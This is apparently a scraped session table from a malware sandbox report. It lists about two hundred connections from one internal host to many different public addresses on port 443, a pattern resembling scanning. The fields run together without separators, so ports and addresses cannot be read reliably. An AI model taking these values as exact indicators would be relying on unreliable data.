                                                10632192.168.2.2352748163.132.47.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10633192.168.2.2342456207.70.30.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10634192.168.2.2342198177.16.105.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10635192.168.2.2347120209.161.79.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10636192.168.2.234624091.170.53.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10637192.168.2.2338842129.237.134.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10638192.168.2.2345768146.134.36.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10639192.168.2.2351414163.82.28.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10640192.168.2.2338450201.9.167.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10641192.168.2.2344136176.118.78.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10642192.168.2.233849614.223.103.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10643192.168.2.2358316199.80.113.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10644192.168.2.234692091.216.199.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10645192.168.2.2342378109.193.160.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10646192.168.2.235032870.106.189.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10647192.168.2.2338474124.131.99.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10648192.168.2.2355816104.49.51.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10649192.168.2.2337282160.96.249.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10650192.168.2.2339226131.243.120.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10651192.168.2.2337002136.246.138.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10652192.168.2.2357598135.188.187.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10653192.168.2.234516452.253.255.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10654192.168.2.2344686157.62.246.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10655192.168.2.235664893.213.22.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10656192.168.2.235838217.55.83.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10657192.168.2.2342640113.253.57.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10658192.168.2.2347294184.33.75.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10659192.168.2.234704454.222.182.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10660192.168.2.23542285.35.218.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10661192.168.2.234319247.163.110.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10662192.168.2.2346932143.153.158.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10663192.168.2.234285097.105.47.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10664192.168.2.236065469.89.82.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10665192.168.2.234799645.5.94.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10666192.168.2.2359706219.223.130.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10667192.168.2.2346374177.79.40.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10668192.168.2.2347192195.86.20.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10669192.168.2.233463468.84.246.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10670192.168.2.234836285.117.110.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10671192.168.2.2354236103.219.53.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10672192.168.2.2357014204.95.250.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10673192.168.2.233420857.154.29.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10674192.168.2.235758678.10.36.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10675192.168.2.2342826201.187.203.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10676192.168.2.2333160147.91.40.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10677192.168.2.2339156184.2.181.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10678192.168.2.2346022170.74.1.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10679192.168.2.2355880202.107.62.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10680192.168.2.2360956221.230.242.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10681192.168.2.2338632151.199.239.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10682192.168.2.235080695.184.16.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10683192.168.2.2337828155.65.45.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10684192.168.2.2353222121.110.220.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10685192.168.2.236041666.208.189.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10686192.168.2.2340356142.247.72.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10687192.168.2.2358674195.243.205.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10688192.168.2.2344282159.39.94.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10689192.168.2.2360502208.252.69.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10690192.168.2.2340642119.139.239.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10691192.168.2.235931884.1.126.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10692192.168.2.2349354223.144.167.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10693192.168.2.234007820.6.133.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10694192.168.2.23572665.207.60.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10695192.168.2.2333516190.83.64.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10696192.168.2.2341932140.87.105.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10697192.168.2.234430851.94.162.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10698192.168.2.23489108.255.133.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10699192.168.2.2333600221.195.37.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10700192.168.2.2336274157.49.242.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10701192.168.2.2356474149.70.195.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10702192.168.2.233594669.87.127.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10703192.168.2.2349904197.166.38.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10704192.168.2.234312624.163.124.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10705192.168.2.2360568151.208.17.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10706192.168.2.2339986195.245.224.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10707192.168.2.236014299.204.59.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10708192.168.2.235109479.212.16.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10709192.168.2.2345442219.12.83.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10710192.168.2.235275887.238.191.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10711192.168.2.235082068.136.200.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10712192.168.2.233985486.69.133.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10713192.168.2.2354204196.59.25.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10714192.168.2.2357586191.250.164.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10715192.168.2.2347726122.12.195.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10716192.168.2.234346454.47.123.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10717192.168.2.235202068.189.28.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10718192.168.2.235690249.138.178.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10719192.168.2.2346308150.140.20.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10720192.168.2.2341342173.238.207.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10721192.168.2.234144412.12.139.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10722192.168.2.2343812208.79.17.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10723192.168.2.233736481.110.171.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10724192.168.2.2340200174.125.112.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10725192.168.2.2360410199.107.82.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10726192.168.2.2350396193.251.202.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10727192.168.2.2359134222.57.69.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10728192.168.2.235141031.39.160.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10729192.168.2.233982641.69.39.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10730192.168.2.2337918169.163.202.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10731192.168.2.235478280.238.189.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10732192.168.2.2359984113.44.92.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10733192.168.2.235381240.147.44.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10734192.168.2.233692473.51.231.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10735192.168.2.235451637.183.230.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10736192.168.2.2339838155.108.16.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10737192.168.2.233538443.12.211.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10738192.168.2.2350448140.231.2.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10739192.168.2.2353370223.139.104.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10740192.168.2.2355254198.193.178.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10741192.168.2.2352722146.171.214.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10742192.168.2.235778252.4.132.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10743192.168.2.2339566171.197.95.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10744192.168.2.2343984199.16.240.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10745192.168.2.2356306181.144.83.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10746192.168.2.2355580106.24.22.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10747192.168.2.2336902142.0.108.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10748192.168.2.2337968210.49.103.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10749192.168.2.235365045.253.203.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10750192.168.2.2356204102.26.73.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10751192.168.2.233767612.188.217.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10752192.168.2.2345436106.11.165.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10753192.168.2.2351184140.100.81.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10754192.168.2.235680270.135.143.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10755192.168.2.2335630160.240.225.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10756192.168.2.2341786154.168.166.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10757192.168.2.2333186164.82.192.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10758192.168.2.2345364137.76.200.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10759192.168.2.2341072196.6.117.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10760192.168.2.2360418113.47.192.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10761192.168.2.2347668125.243.157.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10762192.168.2.2343334128.7.84.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10763192.168.2.2352394158.32.25.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10764192.168.2.2356572134.158.73.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10765192.168.2.233386894.193.118.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10766192.168.2.2358578219.197.55.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10767192.168.2.2342086116.54.244.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10768192.168.2.235254054.175.98.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10769192.168.2.2349266115.8.245.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10770192.168.2.2337986151.132.198.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10771192.168.2.2344678195.192.82.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10772192.168.2.2353996216.126.190.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10773192.168.2.2338290177.188.78.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10774192.168.2.2339948219.223.132.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10775192.168.2.234713047.233.167.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10776192.168.2.235193425.28.112.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10777192.168.2.2356668175.110.89.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10778192.168.2.2347480179.143.25.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10779192.168.2.236029435.61.131.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10780192.168.2.233996034.117.152.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10781192.168.2.235480276.226.170.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10782192.168.2.2360650134.224.173.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10783192.168.2.234274620.77.0.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10784192.168.2.2358588129.147.159.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10785192.168.2.235309239.251.157.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10786192.168.2.233688494.114.16.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10787192.168.2.2352610125.249.205.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10788192.168.2.235216489.65.133.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10789192.168.2.2345134207.236.141.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10790192.168.2.2343172109.44.112.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10791192.168.2.234142282.150.16.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10792192.168.2.2337692190.67.67.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10793192.168.2.2354150202.140.99.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10794192.168.2.2333608184.167.194.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10795192.168.2.2337370176.79.173.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10796192.168.2.2360990129.72.120.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10797192.168.2.2339724168.88.131.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10798192.168.2.234543823.55.44.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10799192.168.2.235608084.247.56.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10800192.168.2.2343124142.85.103.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10801192.168.2.235594463.9.37.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10802192.168.2.2338808204.144.7.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10803192.168.2.2341178179.99.235.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10804192.168.2.2335368154.140.199.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10805192.168.2.233287467.230.4.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10806192.168.2.2347592135.202.175.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10807192.168.2.2357684187.118.18.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10808192.168.2.234997858.49.251.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10809192.168.2.2348502185.157.72.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10810192.168.2.2358746176.62.120.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10811192.168.2.2342018148.39.238.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10812192.168.2.233989097.59.130.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10813192.168.2.236080851.154.19.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10814192.168.2.2336972218.138.36.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10815192.168.2.2343588181.14.38.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10816192.168.2.234166698.84.241.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10817192.168.2.2358526135.73.3.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10818192.168.2.2352056211.222.135.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10819192.168.2.2350172208.224.141.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10820192.168.2.2333686125.214.157.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10821192.168.2.2360114168.136.70.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10822192.168.2.234640074.205.195.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10823192.168.2.2344324193.13.192.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10824192.168.2.2337732153.97.14.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10825192.168.2.2352570120.224.51.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10826192.168.2.2332920139.228.178.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10827192.168.2.2351128152.246.238.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10828192.168.2.2348400112.30.62.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10829192.168.2.233830024.50.169.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10830192.168.2.2341668166.50.182.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10831192.168.2.2338598108.248.136.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10832192.168.2.235764473.75.168.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10833192.168.2.234208045.122.77.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10834192.168.2.2333376119.180.7.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10835192.168.2.2357860144.156.13.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10836192.168.2.2354504185.44.89.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10837192.168.2.23424644.123.57.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10838192.168.2.2346422117.64.128.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10839192.168.2.2355356211.157.64.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10840192.168.2.2347304132.243.112.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10841192.168.2.234694459.194.14.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10842192.168.2.2360400184.8.140.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10843192.168.2.2360236186.248.134.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10844192.168.2.234708290.42.162.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10845192.168.2.23353741.228.75.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10846192.168.2.2350134175.247.225.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10847192.168.2.2346136117.153.56.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10848192.168.2.2349906195.189.30.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10849192.168.2.235139490.230.239.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10850192.168.2.2333680144.198.230.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10851192.168.2.235504068.70.109.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10852192.168.2.2336766165.187.201.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10853192.168.2.235055075.144.220.28443
                                                TimestampBytes transferredDirectionData


